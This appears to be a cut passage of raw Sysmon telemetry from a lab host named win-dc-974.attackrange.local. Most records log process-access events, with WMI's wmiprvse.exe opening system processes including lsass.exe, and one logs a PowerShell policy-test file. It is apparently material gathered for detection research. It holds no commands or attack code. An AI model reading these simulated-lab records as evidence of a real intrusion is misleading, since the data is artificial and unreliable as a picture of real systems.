10341000x80000000000000002239682Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.420{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D99-603E-A9AA-00000000AD01}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239681Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239680Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.420{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D99-603E-A9AA-00000000AD01}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239679Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239678Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239677Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239676Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239675Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239674Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239673Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.420{05ADC7E1-6D99-603E-AEAA-00000000AD01}1493615140C:\Windows\system32\conhost.exe{05ADC7E1-6D99-603E-ADAA-00000000AD01}5320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239672Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239671Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239670Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239669Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239668Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239667Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 11241100x80000000000000002239666Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.420{05ADC7E1-6D99-603E-ABAA-00000000AD01}16164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_vjjn251x.1zj.ps12021-03-02 16:53:45.420 10341000x80000000000000002239665Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239664Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239663Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239662Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239661Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239660Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.404{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6D99-603E-AEAA-00000000AD01}14936C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002239659Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 